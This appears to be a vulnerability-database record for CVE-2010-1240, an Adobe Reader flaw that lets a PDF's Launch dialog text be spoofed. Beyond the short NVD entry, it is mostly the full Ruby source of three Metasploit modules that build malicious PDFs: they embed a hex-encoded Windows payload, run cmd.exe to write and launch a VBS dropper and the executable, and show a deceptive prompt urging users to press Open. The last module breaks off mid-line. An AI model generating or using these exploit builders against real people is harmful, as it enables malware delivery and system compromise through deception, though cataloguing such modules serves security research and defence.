{"cve": [{"lastseen": "2020-10-03T11:57:23", "description": "Adobe Reader and Acrobat 9.x before 9.3.3, and 8.x before 8.2.3 on Windows and Mac OS X, do not restrict the contents of one text field in the Launch File warning dialog, which makes it easier for remote attackers to trick users into executing an arbitrary local program that was specified in a PDF document, as demonstrated by a text field that claims that the Open button will enable the user to read an encrypted message.", "edition": 3, "cvss3": {}, "published": "2010-04-05T15:30:00", "title": "CVE-2010-1240", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1240"], "modified": "2017-09-19T01:30:00", "cpe": ["cpe:/a:adobe:acrobat_reader:9.3.1"], "id": "CVE-2010-1240", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1240", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:acrobat_reader:9.3.1:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:15:25", "description": "", "published": "2010-08-26T00:00:00", "type": "packetstorm", "title": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1240"], "modified": "2010-08-26T00:00:00", "id": "PACKETSTORM:93070", "href": "https://packetstormsecurity.com/files/93070/Adobe-PDF-Escape-EXE-Social-Engineering-No-JavaScript.html", "sourceData": "`## \n# $Id: adobe_pdf_embedded_exe_nojs.rb 10126 2010-08-24 18:20:16Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n# \n# Modified version of the Adobe PDF Embedded EXE Social Engineering \"adobe_pdf_embedded_exe.rb\". \n# This version does not require JavaScript to be enabled and does not required the EXE to be \n# attached to the PDF. The EXE is embedded in the PDF in a non-standard method using HEX \n# encoding. \n# \n# Lots of reused code from adobe_pdf_embedded_exe.rb and the other PDF modules to make the PDF. \n# Thanks to all those that wrote the code for those modules, as I probably could not have \n# wrote this module without borrowing code from them. \n# \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Adobe PDF Escape EXE Social Engineering (No JavaScript)', \n'Description' => %q{ \nThis module embeds a Metasploit payload into an existing PDF file in \na non-standard method. The resulting PDF can be sent to a target as \npart of a social engineering attack. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Jeremy Conway <jeremy[at]sudosecure.net>', \n], \n'Version' => '$Revision: 10126 $', \n'References' => \n[ \n[ 'CVE', '2010-1240' ], \n[ 'OSVDB', '63667' ], \n[ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ], \n[ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ], \n[ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ] \n], \n'Payload' => \n{ \n'Space' => 2048, \n'DisableNops' => true, \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Adobe Reader <= v9.3.3 (Windows XP SP3 English)', { 'Ret' => '' } ] \n], \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('EXENAME', [ false, 'The Name of payload exe.', 'msf.exe']), \nOptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']), \nOptString.new('OUTPUTPATH', [ false, 'The location to output the file.', './data/exploits/']), \nOptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area', \n\"To view the encrypted content please tick the \\\"Do not show this message again\\\" box and press Open.\"]), \n], self.class) \nend \n \ndef exploit \n \n# Create the pdf \nprint_status(\"Making PDF\") \npdf = make_pdf() \nprint_status(\"Creating '#{datastore['FILENAME']}' file...\") \nfile_create(pdf) \nend \n \ndef pdf_exe(payload_exe) \n \nif !(payload_exe and payload_exe.length > 0) \nprint_status(\"Using '#{datastore['PAYLOAD']}' as payload...\") \npayload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) \nhex_payload = Rex::Text.to_hex(payload_exe) \nelse \nprint_status(\"Using '#{datastore['EXENAME']}' as payload...\") \nhex_payload = Rex::Text.to_hex_dump(payload_exe,16) \nend \n \nreturn hex_payload \nend \n \ndef ioDef(id) \n\"%d 0 obj\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \ndef make_pdf() \n \nfile_name = datastore['FILENAME'] \nexe_name = datastore['EXENAME'] \nlaunch_msg = datastore['LAUNCH_MESSAGE'] \n \nxref = [] \neol = \"\\x0d\\x0a\" \nendobj = \"endobj\" << eol \n \npdf = \"%PDF-1.5\" << eol \npayload_exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) \nhex_payload = Rex::Text.to_hex(payload_exe) \npdf << hex_payload << eol \npdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/Launch/Win \") << \"<< \" \npdf << \"/F (cmd.exe) /P (/C echo Set o=CreateObject^(\\\"Scripting.FileSystemObject\\\"^):Set f=o.OpenTextFile^(\\\"#{file_name}\\\",1,True^):\" \npdf << \"f.SkipLine:Set w=CreateObject^(\\\"WScript.Shell\\\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\\\"%TEMP%\\\"^)+\\\"\\\\\\\\#{exe_name}\\\",2,True^):a=Split^(Trim^(Replace^(f.ReadLine,\\\"\\\\\\\\x\\\",\\\" \\\"^)^)^):\" \npdf << \"for each x in a:g.Write^(Chr^(\\\"&h\\\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\\\\\#{exe_name} && del /F 1.vbs\" \npdf << eol << eol << eol << \"#{launch_msg})\" \npdf << \">>>>\" << endobj \nxref << pdf.length \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \npdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \npdf << \"%%EOF\" << eol \n \nend \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/93070/adobe_pdf_embedded_exe_nojs.rb.txt"}], "metasploit": [{"lastseen": "2020-08-07T21:47:57", "description": "This module embeds a Metasploit payload into an existing PDF file in a non-standard method. The resulting PDF can be sent to a target as part of a social engineering attack.\n", "published": "2010-08-24T18:20:16", "type": "metasploit", "title": "Adobe PDF Escape EXE Social Engineering (No JavaScript)", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1240"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_PDF_EMBEDDED_EXE_NOJS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n#\n# Modified version of the Adobe PDF Embedded EXE Social Engineering \"adobe_pdf_embedded_exe.rb\".\n# This version does not require JavaScript to be enabled and does not required the EXE to be\n# attached to the PDF. The EXE is embedded in the PDF in a non-standard method using HEX\n# encoding.\n#\n# Lots of reused code from adobe_pdf_embedded_exe.rb and the other PDF modules to make the PDF.\n# Thanks to all those that wrote the code for those modules, as I probably could not have\n# wrote this module without borrowing code from them.\n#\n\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Adobe PDF Escape EXE Social Engineering (No JavaScript)',\n 'Description' \t=> %q{\n This module embeds a Metasploit payload into an existing PDF file in\n a non-standard method. The resulting PDF can be sent to a target as\n part of a social engineering attack.\n },\n 'License'\t=> MSF_LICENSE,\n 'Author'\t =>\n [\n 'Jeremy Conway <jeremy[at]sudosecure.net>',\n ],\n 'References' =>\n [\n [ 'CVE', '2010-1240' ],\n [ 'OSVDB', '63667' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-15.html' ]\n ],\n 'Payload'\t=>\n {\n 'Space'\t\t\t => 2048,\n 'DisableNops'\t\t=> true,\n 'StackAdjustment'\t=> -3500,\n },\n 'Platform'\t=> 'win',\n 'DisclosureDate' => 'Mar 29 2010',\n 'Targets'\t=>\n [\n [ 'Adobe Reader <= v9.3.3 (Windows XP SP3 English)', { 'Ret' => '' } ]\n ],\n 'DefaultTarget'\t=> 0))\n\n register_options(\n [\n OptString.new('EXENAME', [ false, 'The Name of payload exe.', 'msf.exe']),\n OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),\n OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area',\n \"To view the encrypted content please tick the \\\"Do not show this message again\\\" box and press Open.\"]),\n ])\n end\n\n def exploit\n\n # Create the pdf\n print_status(\"Making PDF\")\n pdf = make_pdf()\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n file_create(pdf)\n end\n\n def pdf_exe(payload_exe)\n\n if !(payload_exe and payload_exe.length > 0)\n print_status(\"Using '#{datastore['PAYLOAD']}' as payload...\")\n payload_exe = generate_payload_exe\n hex_payload = Rex::Text.to_hex(payload_exe)\n else\n print_status(\"Using '#{datastore['EXENAME']}' as payload...\")\n hex_payload = Rex::Text.to_hex_dump(payload_exe,16)\n end\n\n return hex_payload\n end\n\n def io_def(id)\n \"%d 0 obj\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n def make_pdf()\n\n file_name = datastore['FILENAME']\n exe_name = datastore['EXENAME']\n launch_msg = datastore['LAUNCH_MESSAGE']\n\n xref = []\n eol = \"\\x0d\\x0a\"\n endobj = \"endobj\" << eol\n\n pdf = \"%PDF-1.5\" << eol\n payload_exe = generate_payload_exe\n hex_payload = Rex::Text.to_hex(payload_exe)\n pdf << hex_payload << eol\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog/Outlines \") << io_ref(2) << n_obfu(\"/Pages \") << io_ref(3) << n_obfu(\"/OpenAction \") << io_ref(5) << \">>\" << endobj\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<</Type/Outlines/Count 0>>\") << endobj\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Kids[\") << io_ref(4) << n_obfu(\"]/Count 1>>\") << endobj\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3) << n_obfu(\"/MediaBox[0 0 612 792]>>\") << endobj\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/Launch/Win \") << \"<< \"\n pdf << \"/F (cmd.exe) /P (/C echo Set o=CreateObject^(\\\"Scripting.FileSystemObject\\\"^):Set f=o.OpenTextFile^(\\\"#{file_name}\\\",1,True^):\"\n pdf << \"f.SkipLine:Set w=CreateObject^(\\\"WScript.Shell\\\"^):Set g=o.OpenTextFile^(w.ExpandEnvironmentStrings^(\\\"%TEMP%\\\"^)+\\\"\\\\\\\\#{exe_name}\\\",2,True^):\"\n pdf << \"a=Split^(Trim^(Replace^(f.ReadLine,\\\"\\\\\\\\x\\\",\\\" \\\"^)^)^):\"\n pdf << \"for each x in a:g.Write^(Chr^(\\\"&h\\\" ^& x^)^):next:g.Close:f.Close > 1.vbs && cscript //B 1.vbs && start %TEMP%\\\\\\\\#{exe_name} && del /F 1.vbs\"\n pdf << eol << eol << eol << \"#{launch_msg})\"\n pdf << \">>>>\" << endobj\n xref << pdf.length\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n pdf << \"trailer\" << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n pdf << \"%%EOF\" << eol\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb"}, {"lastseen": "2020-08-27T01:47:25", "description": "This module embeds a Metasploit payload into an existing PDF file. The resulting PDF can be sent to a target as part of a social engineering attack.\n", "published": "2010-03-10T05:58:01", "type": "metasploit", "title": "Adobe PDF Embedded EXE Social Engineering", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1240"], "modified": "2020-06-22T11:48:39", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_PDF_EMBEDDED_EXE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::PDF_Parse\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Adobe PDF Embedded EXE Social Engineering',\n 'Description' \t=> %q{\n This module embeds a Metasploit payload into an existing PDF file. The\n resulting PDF can be sent to a target as part of a social engineering attack.\n },\n 'License'\t=> MSF_LICENSE,\n 'Author'\t=>\n [\n 'Colin Ames <amesc[at]attackresearch.com>', # initial module\n 'jduck' # add Documents for vista/win7\n ],\n 'References' =>\n [\n [ 'CVE', '2010-1240' ],\n [ 'OSVDB', '63667' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/' ],\n [ 'URL', 'http://blog.didierstevens.com/2010/03/29/escape-from-pdf/' ],\n [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-15.html' ]\n ],\n 'DisclosureDate' => 'Mar 29 2010',\n 'Payload'\t=>\n {\n 'Space'\t\t\t => 2048,\n 'DisableNops'\t\t=> true,\n 'StackAdjustment'\t=> -3500,\n },\n 'Platform'\t=> 'win',\n 'Targets'\t=>\n [\n [ 'Adobe Reader v8.x, v9.x / Windows XP SP3 (English/Spanish) / Windows Vista/7 (English)', { 'Ret' => '' } ]\n ],\n 'DefaultTarget'\t=> 0))\n\n register_options(\n [\n OptPath.new('INFILENAME', [ true, 'The Input PDF filename.', ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2010-1240', 'template.pdf') ]),\n OptString.new('EXENAME', [ false, 'The Name of payload exe.']),\n OptString.new('FILENAME', [ false, 'The output filename.', 'evil.pdf']),\n OptString.new('LAUNCH_MESSAGE', [ false, 'The message to display in the File: area',\n \"To view the encrypted content please tick the \\\"Do not show this message again\\\" box and press Open.\"]),\n ])\n end\n\n def exploit\n\n file_name = datastore['INFILENAME']\n exe_name = datastore['EXENAME']\n\n print_status(\"Reading in '#{file_name}'...\")\n stream = read_pdf()\n\n begin\n print_status(\"Parsing '#{file_name}'...\")\n pdf_objects = parse_pdf(stream)\n xref_trailers = pdf_objects[0]\n trailers = pdf_objects[1]\n startxrefs = pdf_objects[2]\n root_obj = pdf_objects[3]\n\n output = basic_social_engineering_exploit({\n :xref_trailers => xref_trailers,\n :root_obj => root_obj,\n :stream => stream,\n :trailers => trailers,\n :file_name => file_name,\n :exe_name => exe_name,\n :startxref => startxrefs.last\n })\n\n print_good(\"Parsing Successful. Creating '#{datastore['FILENAME']}' file...\")\n file_create(output)\n rescue KeyError => e\n # Lazy fix:\n # Similar to the problem with NoMethod -- something we need is missing in the PDF.\n # But really what happens is the module trusts the PDF too much.\n\n # Don't be sorry, you're a beautiful human we all appreciate greatly\n print_error(\"Sorry, I'm picky. Incompatible PDF structure. Please try a different PDF template.\")\n elog('Sorry, I\\'m picky. Incompatible PDF structure', error: e)\n rescue NoMethodError => e\n # Lazy fix:\n # When a NoMethod error is hit, that means that something in the PDF is actually missing,\n # so we can't parse it. If we can't parse it properly, then we can't garantee the exploit\n # will work, either. So we might as well just reject it.\n print_error(\"Sorry, I'm picky. Incompatible PDF structure, please try a different PDF template.\")\n elog('Sorry, I\\'m picky. Incompatible PDF structure', error: e)\n end\n end\n\n\n def ef_payload(pdf_name,payload_exe,obj_num)\n\n if !(payload_exe and payload_exe.length > 0)\n print_status(\"Using '#{datastore['PAYLOAD']}' as payload...\")\n\n payload_exe = generate_payload_exe\n file_size = payload_exe.length\n stream = Rex::Text.zlib_deflate(payload_exe)\n md5 = Rex::Text.md5(stream)\n\n else\n print_status(\"Using '#{datastore['EXENAME']}' as payload...\")\n\n file_size = File.size(payload_exe)\n stream = Rex::Text.zlib_deflate(IO.read(payload_exe))\n md5 = Rex::Text.md5(File.read(payload_exe))\n\n end\n\n output = String.new()\n\n output << \"#{obj_num.to_i + 1} 0 obj\\r<</UF(#{pdf_name}.pdf)/F(#{pdf_name}.pdf)/EF<</F #{obj_num.to_i + 2} 0 R>>/Desc(#{pdf_name})/Type/Filespec>>\\rendobj\\r\"\n output << \"#{obj_num.to_i + 2} 0 obj\\r<</Subtype/application#2Fpdf/Length #{stream.length + 3}/Filter/FlateDecode/DL #{file_size}/Params<</Size #{file_size}/CheckSum<#{md5.upcase}>>>>>\"\n output << \"stream\\r#{stream}\\r\\nendstream\\rendobj\\r\"\n\n return output\n end\n\n def js_payload(pdf_name,obj_num)\n\n output = String.new()\n output << \"#{obj_num.to_i + 3} 0 obj\\r<</S/JavaScript/JS(this.exportDataObject({ cName: \\\"#{pdf_name}\\\", nLaunch: 0 });)/Type/Action>>\\rendobj\\r\"\n output << \"#{obj_num.to_i + 4} 0 obj\\r<</S/Launch/Type/Action/Win<</F(cmd.exe)/D(c:\\\\\\\\windows\\\\\\\\system32)/P(/Q /C \"\n\n # change to the home drive/path no matter what\n output << \"%HOMEDRIVE%&cd %HOMEPATH%\"\n\n # check for the pdf in these dirs, in this order..\n dirs = [ \"Desktop\", \"My Documents\", \"Documents\", \"Escritorio\", \"Mis Documentos\" ]\n dirs.each { |dir|\n fmt = \"&\"+\n \"(\"+\n \"if exist \\\"%s\\\" \"+\n \"(cd \\\"%s\\\")\"+\n \")\"\n fname = \"%s\\\\\\\\#{pdf_name}.pdf\" % dir\n output << fmt % [fname, dir]\n }\n launch_message = datastore['LAUNCH_MESSAGE']\n lines = []\n launch_message.gsub(/.{1,80}(?:\\s|\\Z)/) { lines << $& }\n if (lines.length > 2)\n print_warning(\"Warning: the LAUNCH_MESSAGE is more than 2 lines. It may not display correctly.\")\n end\n\n output << \"&\"+\n # note: the following doesn't work with spaces, and adding quotes doesn't execute the payload :-/\n \"(start #{pdf_name}.pdf)\"+\n # note: The below message modifies the text in the \"File:\" textfield of the \"Launch File\" dialog\n (\"\\n\"*10) +\n launch_message+\n # note: this extra rparen is required.\n \")\"+\n \">>>>\\rendobj\\r\"\n\n return output\n\n end\n\n\n def basic_social_engineering_exploit(opts = {})\n\n xref_trailers = opts[:xref_trailers]\n root_obj = opts[:root_obj]\n stream = opts[:stream]\n trailers = opts[:trailers]\n file_name = opts[:file_name]\n exe_name = opts[:exe_name]\n startxref = opts[:startxref]\n\n file_name = file_name.split(/\\//).pop.to_s\n\n match = file_name.match(/(.+)\\.pdf/)\n if match\n pdf_name = match[1]\n end\n\n catalog = parse_object(xref_trailers,root_obj,stream)\n\n\n match = catalog.match(/Names (\\d+ \\d) R/m)\n if match\n\n names = parse_object(xref_trailers,match[1],stream)\n match = names.match(/EmbeddedFiles (\\d+ \\d) R/m)\n if match\n embedded_files = parse_object(xref_trailers,match[1],stream)\n new_embedded_files = embedded_files.gsub(/(\\]>>)/m,\"(\\xfe\\xff#{Rex::Text.to_unicode(pdf_name,\"utf-16be\")})#{trailers[0].fetch(\"Size\")} 0 R\" + '\\1')\n else\n new_names = names.gsub(/(>>.*)/m,\"/EmbeddedFiles #{trailers[0].fetch(\"Size\")} 0 R\" + '\\1')\n end\n\n else\n new_catalog = catalog.gsub(/(Pages \\d+ \\d R)/m,'\\1' + \"/Names #{trailers[0].fetch(\"Size\")} 0 R\")\n end\n\n if catalog.match(/OpenAction/m)\n\n match = catalog.match(/OpenAction (\\d+ \\d) R/m)\n if match\n open_action = \"#{match[1]} R\"\n\n if new_catalog\n if new_embedded_files\n new_catalog = new_catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 2} 0 R\")\n elsif new_names\n new_catalog = new_catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 3} 0 R\")\n else\n new_catalog = new_catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 4} 0 R\")\n end\n else\n if new_embedded_files\n new_catalog = catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 2} 0 R\")\n elsif new_names\n new_catalog = catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 3} 0 R\")\n else\n new_catalog = catalog.gsub(/OpenAction \\d+ \\d R/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 4} 0 R\")\n end\n\n end\n else\n if new_catalog\n new_catalog = new_catalog.gsub(/OpenAction ?\\[.+\\]/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 4} 0 R\")\n else\n new_catalog = catalog.gsub(/OpenAction ?\\[.+\\]/m, \"OpenAction #{trailers[0].fetch(\"Size\").to_i + 3} 0 R\")\n end\n end\n else\n if new_catalog\n if new_embedded_files\n new_catalog = new_catalog.gsub(/(Names \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 2} 0 R\")\n elsif new_names\n new_catalog = new_catalog.gsub(/(Names \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 3} 0 R\")\n else\n new_catalog = new_catalog.gsub(/(Names \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 4} 0 R\")\n end\n\n else\n if new_embedded_files\n new_catalog = catalog.gsub(/(Pages \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 2} 0 R\")\n elsif new_names\n new_catalog = catalog.gsub(/(Pages \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 3} 0 R\")\n else\n new_catalog = catalog.gsub(/(Pages \\d+ \\d R)/m,'\\1' + \"/OpenAction #{trailers[0].fetch(\"Size\").to_i + 4} 0 R\")\n end\n end\n end\n\n pages_obj = catalog.match(/Pages (\\d+ \\d) R/m)[1]\n pages = parse_object(xref_trailers,pages_obj,stream)\n\n page_obj = pages.match(/Kids ?\\[\\r?\\n? *(\\d+ \\d) R/m)[1]\n page = parse_object(xref_trailers,page_obj,stream)\n\n match = page.match(/Kids ?\\[\\r?\\n? *(\\d+ \\d) R/m)\n while match\n\n page_obj = match[1]\n page = parse_object(xref_trailers,page_obj,stream)\n match = page.match(/Kids ?\\[\\r?\\n? *(\\d+ \\d) R/m)\n end\n\n match = page.match(/AA<<\\/O (\\d+ \\d) R/m)\n if match\n aa = parse_object(xref_trailers,match[1],stream)\n end\n\n\n new_pdf = String.new()\n xrefs = String.new()\n\n\n if new_embedded_files\n pdf_payload = String.new()\n num = trailers[0].fetch(\"Size\").to_i - 1\n pdf_payload << ef_payload(pdf_name,exe_name,num)\n pdf_payload << js_payload(pdf_name,num)\n new_pdf << stream << pdf_payload\n\n xrefs = xref_create(new_pdf,stream.length,\"*\")\n\n new_size = trailers[0].fetch(\"Size\").to_i + 4\n\n if aa\n new_page = page.gsub(/(AA<<\\/O )\\d+ \\d R(.*)/m,'\\1' + \"#{trailers[0].fetch(\"Size\").to_i + 3} 0\" + '\\2')\n else\n new_page = page.gsub(/(>> *\\r?\\n? *endobj)/m,\"/AA<<\\/O #{trailers[0].fetch(\"Size\").to_i + 3} 0 R>>\" + '\\1')\n end\n\n new_pdf << new_catalog\n xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), \"1\")\n\n new_pdf << new_page\n xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), \"1\")\n\n new_pdf << new_embedded_files\n xrefs << xref_create(new_pdf,(new_pdf.length - new_embedded_files.length), \"1\")\n\n if trailers[0].has_key?(\"ID\")\n new_pdf << \"xref\\r\\n\" << xrefs << \"trailer\\r\\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch(\"Root\")} R/Info #{trailers[0].fetch(\"Info\")} R/ID#{trailers[0].fetch(\"ID\")}>>\\r\\n\"\n else\n new_pdf << \"xref\\r\\n\" << xrefs << \"trailer\\r\\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch(\"Root\")} R/Info #{trailers[0].fetch(\"Info\")} R>>\\r\\n\"\n end\n\n new_pdf << \"startxref\\r\\n#{stream.length + pdf_payload.length + new_embedded_files.length + new_page.length + new_catalog.length}\\r\\n%%EOF\\r\\n\"\n\n elsif new_names\n pdf_payload = String.new()\n num = trailers[0].fetch(\"Size\").to_i\n pdf_payload << \"#{num} 0 obj\\r<</Names[(\\xfe\\xff#{Rex::Text.to_unicode(pdf_name,\"utf-16be\")})#{num + 1} 0 R]>>\\rendobj\\r\"\n pdf_payload << ef_payload(pdf_name,exe_name,num)\n pdf_payload << js_payload(pdf_name,num)\n new_pdf << stream << pdf_payload\n\n xrefs = xref_create(new_pdf,stream.length,\"*\")\n\n new_size = trailers[0].fetch(\"Size\").to_i + 5\n\n if aa\n new_page = page.gsub(/(AA<<\\/O )\\d+ \\d(.*)/m,'\\1' + \"#{trailers[0].fetch(\"Size\").to_i + 4} 0\" + '\\2')\n else\n new_page = page.gsub(/(>> *\\r?\\n? *endobj)/m,\"/AA<<\\/O #{trailers[0].fetch(\"Size\").to_i + 4} 0 R>>\" + '\\1')\n end\n\n new_pdf << new_catalog\n xrefs << xref_create(new_pdf,(new_pdf.length - new_catalog.length), \"1\")\n\n new_pdf << new_page\n xrefs << xref_create(new_pdf,(new_pdf.length - new_page.length), \"1\")\n\n new_pdf << new_names\n xrefs << xref_create(new_pdf,(new_pdf.length - new_names.length), \"1\")\n\n if trailers[0].has_key?(\"ID\")\n new_pdf << \"xref\\r\\n\" << xrefs << \"trailer\\r\\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch(\"Root\")} R/Info #{trailers[0].fetch(\"Info\")} R/ID#{trailers[0].fetch(\"ID\")}>>\\r\\n\"\n else\n new_pdf << \"xref\\r\\n\" << xrefs << \"trailer\\r\\n<</Size #{new_size}/Prev #{startxref}/Root #{trailers[0].fetch(\"Root\")} R/Info #{trailers[0].fetch(\"Info\")} R>>\\r\\n\"\n end\n\n new_pdf << 